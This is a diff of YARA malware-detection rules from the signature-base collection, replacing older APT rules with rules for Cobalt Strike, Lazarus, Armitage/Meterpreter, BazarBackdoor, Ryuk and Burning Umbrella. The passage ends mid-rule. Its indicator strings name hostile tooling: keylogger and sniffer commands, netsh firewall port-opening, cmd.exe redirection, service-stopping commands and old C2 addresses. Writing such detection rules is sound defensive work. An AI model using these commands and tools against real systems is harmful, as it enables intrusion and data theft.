+		uint16( 0 ) == 0x253c and filesize < 6KB and all of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Pvz_In
+rule SIGNATURE_BASE_SUSP_Email_Redirection_Spoofing_Feb25
 {
 	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "dede12b3-f1dd-58ba-a860-829b2331b740"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L222-L236"
+		description = "Detects redirect spoofing in embedded URLs. This technique is used by threat actors to obscure the actual destination of a link"
+		author = "Jonathan Peters (cod3nym)"
+		id = "bf3a2b06-4dc5-5f0f-bf1f-2bd6a1cc4a8d"
+		date = "2025-02-20"
+		modified = "2025-03-20"
+		reference = "https://any.run/cybersecurity-blog/cyber-attacks-january-2025/#fake-youtube-links-redirect-users-to-phishing-pages-11298"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/susp_email_redirection_spoofing.yar#L1-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eae778162be5dcfa0005bb237c5209e7103db3549e06706744f9ebdf04e192df"
+		hash = "9b196220b369c199a7e4d57cb5db18b32eb2565a6f9190929c5c01ac4fa04ac8"
+		hash = "c4eb35c1a1c10226bff9bb0c88ca516441208d193b4994eeb292a66e53a2cc04"
+		hash = "e3b8ea03a472348814c6ac81088234836e627a1878ec36e46ce62526e1390935"
+		logic_hash = "9a411317821751dc0873fe3163791115d1e19bc4d57119ed2ba513b444864032"
 		score = 70
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "LAST_TIME=00/00/0000:00:00PM$"
-		$s2 = "if %%ERRORLEVEL%% == 1 GOTO line"
+		$sa1 = "Content-Transfer-Encoding:" ascii
+		$sa2 = "Subject:" ascii
+		$x = ".com%20%20%20%20%20%" ascii
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Pvz_Out
+rule SIGNATURE_BASE_HKTL_Cobaltstrike_Sleepmask_Jul22
 {
 	meta:
-		description = "Parviz tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "46b51bff-dfd9-5f56-897c-422112bc837b"
-		date = "2014-12-02"
+		description = "Detects static bytes in Cobalt Strike 4.5 sleep mask function that are not obfuscated"
+		author = "CodeX"
+		id = "d396ab0e-b584-5a7c-8627-5f318a20f9dd"
+		date = "2022-07-04"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L238-L252"
+		reference = "https://codex-7.gitbook.io/codexs-terminal-window/blue-team/detecting-cobalt-strike/sleep-mask-kit-iocs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cobaltstrike.yar#L3-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "849300c32d2df42a011386903495d271810fd8a40c76d1a0c6295c059deb3a05"
-		score = 70
+		logic_hash = "233b3cb441f45f400c0261589aac31dd1fcd9c4e3a86a6aaa46c60849063b34b"
+		score = 80
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "Network Connectivity Module" wide
-		$s2 = "OSPPSVC" wide
+		$sleep_mask = { 48 8B C4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 45 33 DB 45 33 D2 33 FF 33 F6 48 8B E9 BB 03 00 00 00 85 D2 0F 84 81 00 00 00 0F B6 45 }
 
 	condition:
-		all of them
+		$sleep_mask
 }
-rule SIGNATURE_BASE_OPCLEAVER_Wndtest
+rule SIGNATURE_BASE_APT_NK_Lazarus_RC4_Loop : FILE
 {
 	meta:
-		description = "Backdoor used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "f8daa0a8-f0f0-5bf7-b9ab-eaf5335ff2b9"
-		date = "2014-12-02"
+		description = "Detects RC4 loop in Lazarus Group implant"
+		author = "f-secure "
+		id = "a9503795-b4b8-505e-a1bf-df64ec8c1c32"
+		date = "2020-06-10"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L254-L269"
+		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_aug20.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "3b29c2b92b816bd0559695cb6b0b6e050ca8c5e256ec92448535fe9edf20757f"
-		score = 70
+		logic_hash = "b0e96bfff924a0c9b39e1ab03097ae0790743417d9da70917d64bc238905971e"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 
 	strings:
-		$s1 = "[Alt]" wide
-		$s2 = "<< %s >>:" wide
-		$s3 = "Content-Disposition: inline; comp=%s; account=%s; product=%d;"
+		$str_rc4_loop = { 41 FE 8? 00 01 00 00 45 0F B6 ?? 00 01 00 00 48
+                        FF C? 43 0F B6 0? ?? 41 00 8? 01 01 00 00 41 0F
+                        B6 ?? 01 01 00 00 }
 
 	condition:
-		all of them
+		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and $str_rc4_loop
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhcat
+rule SIGNATURE_BASE_APT_NK_Lazarus_Network_Backdoor_Unpacked : FILE
 {
 	meta:
-		description = "Network tool used by Iranian hackers and used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "e1f1bc48-b895-5e23-8ffd-b6ea9c8eb26f"
-		date = "2014-12-02"
+		description = "Detects unpacked variant of Lazarus Group network backdoor"
+		author = "f-secure"
+		id = "8eda9e74-1a19-5510-82d8-cd2eb324629c"
+		date = "2020-06-10"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L271-L285"
+		reference = "https://labs.f-secure.com/publications/ti-report-lazarus-group-cryptocurrency-vertical"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_aug20.yar#L17-L41"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ef5112532ba62cb2cf6a1c62b344d9146c5b8e2da50990c8cfd60d91b99bcb5e"
-		score = 70
-		quality = 85
-		tags = ""
+		logic_hash = "bfc3cf400eeea332e2e44b65f9728e94af0adde76b32ed4be527b25484f80745"
+		score = 75
+		quality = 75
+		tags = "FILE"
 
 	strings:
-		$s1 = "Mozilla/4.0 ( compatible; MSIE 7.0; AOL 8.0 )" ascii fullword
-		$s2 = "ABC ( A Big Company )" wide fullword
+		$str_netsh_1 = "netsh firewall add portopening TCP %d" ascii wide nocase
+		$str_netsh_2 = "netsh firewall delete portopening TCP %d" ascii wide nocase
+		$str_mask_1 = "cmd.exe /c \"%s >> %s 2>&1\"" ascii wide
+		$str_mask_2 = "cmd.exe /c \"%s 2>> %s\"" ascii wide
+		$str_mask_3 = "%s\\%s\\%s" ascii wide
+		$str_other_1 = "perflog.dat" ascii wide nocase
+		$str_other_2 = "perflog.evt" ascii wide nocase
+		$str_other_3 = "cbstc.log" ascii wide nocase
+		$str_other_4 = "LdrGetProcedureAddress" ascii
+		$str_other_5 = "NtProtectVirtualMemory" ascii
 
 	condition:
-		all of them
+		int16 ( 0 ) == 0x5a4d and filesize < 3000KB and 1 of ( $str_netsh* ) and 1 of ( $str_mask* ) and 1 of ( $str_other* )
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhlookup
+rule SIGNATURE_BASE_Armitage_Msfconsole : FILE
 {
 	meta:
-		description = "Hack tool used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "45ef9a90-db4c-59c3-b694-da3f539b118b"
-		date = "2014-12-02"
-		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L287-L300"
+		description = "Detects Armitage component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9c610cd0-663e-54ea-a0f2-6c044fc45d23"
+		date = "2017-12-24"
+		modified = "2022-08-18"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L14-L29"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9cc476e016708fd1604a63e2391057dc9dd0865448b62742ec596d6de54bf8f6"
-		score = 70
+		logic_hash = "cf9df9858ca584288288fd0b55fdcf65aeea410f25531ee3d8cf48c30d23824a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		hash1 = "662ba75c7ed5ac55a898f480ed2555d47d127a2d96424324b02724b3b2c95b6a"
 
 	strings:
-		$s1 = "zhLookUp.Properties"
+		$s1 = "\\umeterpreter\\u >" ascii
+		$s3 = "^meterpreter >" fullword ascii
+		$s11 = "\\umsf\\u>" ascii
 
 	condition:
-		all of them
+		filesize < 1KB and 2 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Zhmimikatz
+rule SIGNATURE_BASE_Armitage_Meterpretersession_Strings : FILE
 {
 	meta:
-		description = "Mimikatz wrapper used by attackers in Operation Cleaver"
-		author = "Cylance Inc."
-		id = "fba8ab6e-3b61-53a1-b4df-178442e3cf24"
-		date = "2014-12-02"
+		description = "Detects Armitage component"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c49fdb73-1c95-5c63-b039-2fddb77290dc"
+		date = "2017-12-24"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L302-L316"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L33-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1d6ce5b3351d4b01abe0c2f614d002d4e96599b4bfa01138704a3fdf345d0786"
-		score = 70
+		logic_hash = "3a21a42df8f15e3e81c797feb284edfe2de7d1c182547e8606f0e48dc08f6939"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "b258b2f12f57ed05d8eafd29e9ecc126ae301ead9944a616b87c240bf1e71f9a"
+		hash2 = "144cb6b1cf52e60f16b45ddf1633132c75de393c2705773b9f67fce334a3c8b8"
 
 	strings:
-		$s1 = "MimikatzRunner"
-		$s2 = "zhmimikatz"
+		$s1 = "session.meterpreter_read" fullword ascii
+		$s2 = "sniffer_dump" fullword ascii
+		$s3 = "keyscan_dump" fullword ascii
+		$s4 = "MeterpreterSession.java" fullword ascii
 
 	condition:
-		all of them
+		filesize < 30KB and 1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Parviz_Developer
+rule SIGNATURE_BASE_Armitage_OSX : FILE
 {
 	meta:
-		description = "Parviz developer known from Operation Cleaver"
+		description = "Detects Armitage component"
 		author = "Florian Roth (Nextron Systems)"
-		id = "2bfa90a0-0495-5b21-98f7-5ed7ebc74b2d"
-		date = "2014-12-02"
+		id = "e886e866-c163-56fb-9631-c586e9f23f9e"
+		date = "2017-12-24"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L318-L332"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_armitage.yar#L52-L68"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6ae043ee5baa7361def79811350317baf54eb76cf15001a7785808dc7947fddc"
-		score = 70
+		logic_hash = "25c94b9715fdc10d0e04eea7d5b9974e60f3e248f51b80de80542b169996fc7a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2680d9900a057d553fcb28d84cdc41c3fc18fd224a88a32ee14c9c1b501a86af"
+		hash2 = "b7b506f38d0553cd2beb4111c7ef383c821f04cee5169fed2ef5d869c9fbfab3"
 
 	strings:
-		$s1 = "Users\\parviz\\documents\\" nocase
+		$x1 = "resources/covertvpn-injector.exe" fullword ascii
+		$s10 = "resources/browserpivot.x64.dll" fullword ascii
+		$s17 = "resources/msfrpcd_new.bat" fullword ascii
 
 	condition:
-		$s1
+		filesize < 6000KB and 1 of them
 }
-rule SIGNATURE_BASE_OPCLEAVER_Ccproxy_Config
+rule SIGNATURE_BASE_Crime_Win64_Backdoor_Bazarbackdoor1 : FILE
 {
 	meta:
-		description = "CCProxy config known from Operation Cleaver"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c4d80a2a-2a32-585e-bc20-1c5118e4ee48"
-		date = "2014-12-02"
+		description = "Detects BazarBackdoor injected 64-bit malware"
+		author = "@VK_Intel"
+		id = "1e387791-97fa-527d-87ed-68872b1891c4"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "http://cylance.com/assets/Cleaver/Cylance_Operation_Cleaver_Report.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_op_cleaver.yar#L334-L352"
+		reference = "https://twitter.com/pancak3lullz/status/1252303608747565057"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_bazarbackdoor.yar#L1-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6e5c1c75a499434ad6ddd2439d28ac91d500b18418e693761d0b236bf6d6ce42"
-		score = 70
+		logic_hash = "becb6ebc3a1be061b4f602cc188b172f59bfb6342605af68d8b38009d589f57e"
+		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
+		tlp = "white"
 
 	strings:
-		$s1 = "UserName=User-001" fullword ascii
-		$s2 = "Web=1" fullword ascii
-		$s3 = "Mail=1" fullword ascii
-		$s4 = "FTP=0" fullword ascii
-		$x1 = "IPAddressLow=78.109.194.114" fullword ascii
+		$str1 = "%id%"
+		$start = { 48 ?? ?? ?? ?? 57 48 83 ec 30 b9 01 00 00 00 e8 ?? ?? ?? ?? 84 c0 0f ?? ?? ?? ?? ?? 40 32 ff 40 ?? ?? ?? ?? e8 ?? ?? ?? ?? 8a d8 8b ?? ?? ?? ?? ?? 83 f9 01 0f ?? ?? ?? ?? ?? 85 c9 75 ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? 85 c0 74 ?? b8 ff 00 00 00 e9 ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? 48 ?? ?? ?? ?? ?? ?? e8 ?? ?? ?? ?? c7 ?? ?? ?? ?? ?? ?? ?? ?? ?? eb ?? 40 b7 01 40 ?? ?? ?? ?? 8a cb e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 48 8b d8 48 ?? ?? ?? 74 ??}
+		$server = {40 53 48 83 ec 20 48 8b d9 e8 ?? ?? ?? ?? 85 c0 75 ?? 0f ?? ?? ?? ?? ?? ?? 66 83 f8 50 74 ?? b9 bb 01 00 00 66 3b c1 74 ?? a8 01 74 ?? 48 8b cb e8 ?? ?? ?? ?? 84 c0 75 ?? 48 8b cb e8 ?? ?? ?? ?? b8 f6 ff ff ff eb ?? 33 c0 48 83 c4 20 5b c3}
 
 	condition:
-		all of ( $s* ) or $x1
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_Apt_Equation_Exploitlib_Mutexes : FILE
+
+rule SIGNATURE_BASE_MAL_Ryuk_Ransomware : FILE
 {
 	meta:
-		description = "Rule to detect Equation group's Exploitation library http://goo.gl/ivt8EW"
-		author = "Kaspersky Lab"
-		id = "d060bfd7-fb16-55d3-8a39-1197fdd8e759"
-		date = "2016-02-15"
-		modified = "2023-01-27"
-		reference = "http://securelist.com/blog/research/68750/equation-the-death-star-of-malware-galaxy/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L3-L20"
+		description = "Detects strings known from Ryuk Ransomware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "25d40631-4158-5d3d-913e-a2f1233489e0"
+		date = "2018-12-31"
+		modified = "2023-12-05"
+		reference = "https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ryuk_ransomware.yar#L3-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4414dd4ca16d08b8edad26842640960ace434cdde769766fb1c38a1a249565fd"
+		logic_hash = "01e8ad348e5954374fc0f9fc25ba1ee83db4a2a50e622b27640aa2eb394dc5a0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		hash1 = "965884f19026913b2c57b8cd4a86455a61383de01dabb69c557f45bb848f6c26"
+		hash2 = "b8fcd4a3902064907fb19e0da3ca7aed72a7e6d1f94d971d1ee7a4d3af6a800d"
 
 	strings:
-		$a1 = "prkMtx" wide
-		$a2 = "cnFormSyncExFBC" wide
-		$a3 = "cnFormVoidFBC" wide
-		$a4 = "cnFormSyncExFBC"
-		$a5 = "cnFormVoidFBC"
+		$x1 = "/v \"svchos\" /f" fullword wide
+		$x2 = "\\Documents and Settings\\Default User\\finish" wide
+		$x3 = "\\users\\Public\\finish" wide
+		$x4 = "lsaas.exe" fullword wide
+		$x5 = "RyukReadMe.txt" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $a* )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( pe.imphash ( ) == "4a069c1abe5aca148d5a8fdabc26751e" or pe.imphash ( ) == "dc5733c013378fa418d13773f5bfe6f1" or 1 of them )
 }
-rule SIGNATURE_BASE_Apt_Equation_Equationlaser_Runtimeclasses
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_1 : FILE
 {
 	meta:
-		description = "Rule to detect the EquationLaser malware"
-		author = "Kaspersky Lab"
-		id = "924c80ca-3607-57aa-85a2-b33ff52b0c1b"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L40-L57"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "9f8a6831-172b-5310-9763-43657b79b91d"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "663ea56f869f7099a92658df5bddd76d4e5ba8ac5dfc693733579682b9eee860"
+		logic_hash = "d8ed432fea930eb9b4d695a4a68b833f4324fe0bbea3f0ccac2fe5934bfa1c22"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fcfe8fcf054bd8b19226d592617425e320e4a5bb4798807d6f067c39dfc6d1ff"
 
 	strings:
-		$a1 = "?a73957838_2@@YAXXZ"
-		$a2 = "?a84884@@YAXXZ"
-		$a3 = "?b823838_9839@@YAXXZ"
-		$a4 = "?e747383_94@@YAXXZ"
-		$a5 = "?e83834@@YAXXZ"
-		$a6 = "?e929348_827@@YAXXZ"
+		$s1 = { 40 00 00 E0 75 68 66 61 6F 68 6C 79 }
+		$s2 = { 40 00 00 E0 64 6A 7A 66 63 6D 77 62 }
 
 	condition:
-		any of them
+		uint16( 0 ) == 0x5a4d and filesize < 4000KB and ( pe.imphash ( ) == "baa93d47220682c04d92f7797d9224ce" and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) )
 }
-rule SIGNATURE_BASE_Apt_Equation_Cryptotable
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_2 : FILE
 {
 	meta:
-		description = "Rule to detect the crypto library used in Equation group malware"
-		author = "Kaspersky Lab"
-		id = "e7f313a3-8ef8-5363-898a-836a96aaa2ff"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "https://securelist.com/blog/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L59-L71"
+		description = "Detects malware sample from Burning Umbrella report"
+		author = "Florian Roth (Nextron Systems)"
+		id = "926b4a29-ce47-559b-94e3-1fabd90f3fbe"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L33-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e660fe423330334a1e3167d6a45e5ce2469fec276838618a7cb0340ec8172275"
+		logic_hash = "0c298176e5849b2b202089f27cffb7646243d19a90898bbf079a97d2f624a27e"
 		score = 75
 		quality = 85
-		tags = ""
-		version = "1.0"
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "801a64a730fc8d80e17e59e93533c1455686ca778e6ba99cf6f1971a935eda4c"
 
 	strings:
-		$a = {37 DF E8 B6 C7 9C 0B AE 91 EF F0 3B 90 C6 80 85 5D 19 4B 45 44 12 3C E2 0D 5C 1C 7B C4 FF D6 05 17 14 4F 03 74 1E 41 DA 8F 7D DE 7E 99 F1 35 AC B8 46 93 CE 23 82 07 EB 2B D4 72 71 40 F3 B0 F7 78 D7 4C D1 55 1A 39 83 18 FA E1 9A 56 B1 96 AB A6 30 C5 5F BE 0C 50 C1}
+		$s1 = { 40 00 00 E0 63 68 72 6F 6D 67 75 78 }
+		$s2 = { 40 00 00 E0 77 62 68 75 74 66 6F 61 }
+		$s3 = "ActiveX Manager" wide
 
 	condition:
-		$a
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and $s1 in ( 0 .. 1024 ) and $s2 in ( 0 .. 1024 ) and $s3
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Triplefantasy_1 : FILE
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_3 : FILE
 {
 	meta:
-		description = "Equation Group Malware - TripleFantasy http://goo.gl/ivt8EW"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "8d2adb3c-70e0-5768-bcfa-be64220064d9"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L75-L107"
+		id = "b997822a-3f62-51b4-bd96-e780ffe60812"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L53-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "b2b2cd9ca6f5864ef2ac6382b7b6374a9fb2cbe9"
-		logic_hash = "cfa3c1756c8dfb04e0a1590f76cad6d5b3878000d220c263d199322cf6a4f58a"
+		logic_hash = "ad39864eec58b1c655bd3d510faa314702d118cee845da55d189e7252174eafb"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "92efbecc24fbb5690708926b6221b241b10bdfe3dd0375d663b051283d0de30f"
 
 	strings:
-		$s0 = "%SystemRoot%\\system32\\hnetcfg.dll" fullword wide
-		$s1 = "%WINDIR%\\System32\\ahlhcib.dll" fullword wide
-		$s2 = "%WINDIR%\\sjyntmv.dat" fullword wide
-		$s3 = "Global\\{8c38e4f3-591f-91cf-06a6-67b84d8a0102}" fullword wide
-		$s4 = "%WINDIR%\\System32\\owrwbsdi" fullword wide
-		$s5 = "Chrome" fullword wide
-		$s6 = "StringIndex" fullword ascii
-		$x1 = "itemagic.net@443" fullword wide
-		$x2 = "team4heat.net@443" fullword wide
-		$x5 = "62.216.152.69@443" fullword wide
-		$x6 = "84.233.205.37@443" fullword wide
-		$z1 = "www.microsoft.com@80" fullword wide
-		$z2 = "www.google.com@80" fullword wide
-		$z3 = "127.0.0.1:3128" fullword wide
+		$s1 = "HKEY_CLASSES_ROOT\\Word.Document.8\\shell\\Open\\command" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300000 and ( ( all of ( $s* ) and all of ( $z* ) ) or ( all of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and 1 of them
 }
-rule SIGNATURE_BASE_Equation_Kaspersky_Doublefantasy_1 : FILE
+
+rule SIGNATURE_BASE_MAL_Burningumbrella_Sample_4 : FILE
 {
 	meta:
-		description = "Equation Group Malware - DoubleFantasy"
+		description = "Detects malware sample from Burning Umbrella report"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f3c87adf-86c3-5d7c-9532-75341841869a"
-		date = "2015-02-16"
-		modified = "2025-03-29"
-		reference = "http://goo.gl/ivt8EW"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/spy_equation_fiveeyes.yar#L109-L138"
+		id = "3489f64b-7ebc-55b8-bd11-afaa719e572b"
+		date = "2018-05-04"
+		modified = "2023-12-05"
+		reference = "https://401trg.pw/burning-umbrella/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_winnti_burning_umbrella.yar#L68-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "d09b4b6d3244ac382049736ca98d7de0c6787fa2"
-		logic_hash = "4471601300616b5442de95a3eb23c28563206f3423b57fe81007d005203a439f"
+		logic_hash = "1889ce1101ebb352c33279d40641f1f2312c45c6f7e267f4912a9faf320e5971"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a1629e8abce9d670fdb66fa1ef73ad4181706eefb8adc8a9fd257b6a21be48c6"
 
 	strings:
-		$z1 = "msvcp5%d.dll" fullword ascii
-		$s0 = "actxprxy.GetProxyDllInfo" fullword ascii
-		$s3 = "actxprxy.DllGetClassObject" fullword ascii
-		$s5 = "actxprxy.DllRegisterServer" fullword ascii
-		$s6 = "actxprxy.DllUnregisterServer" fullword ascii
-		$x2 = "191H1a1" fullword ascii
-		$x3 = "November " fullword ascii
-		$x4 = "abababababab" fullword ascii
-		$x5 = "January " fullword ascii
-		$x6 = "October " fullword ascii
-		$x7 = "September " fullword ascii
+		$x1 = "dumpodbc.exe" fullword ascii
+		$x2 = "photo_Bundle.exe" fullword ascii
+		$x3 = "Connect 2 fails : %d,%s:%d" fullword ascii
+		$x4 = "Connect fails 1 : %d %s:%d" fullword ascii
+		$x5 = "New IP : %s,New Port: %d" fullword ascii
+		$x6 = "Micrsoft Corporation. All rights reserved." fullword wide
+		$x7 = "New ConFails : %d" fullword ascii
+		$s1 = "cmd /c net stop stisvc" fullword ascii
+		$s2 = "cmd /c net stop spooler" fullword ascii
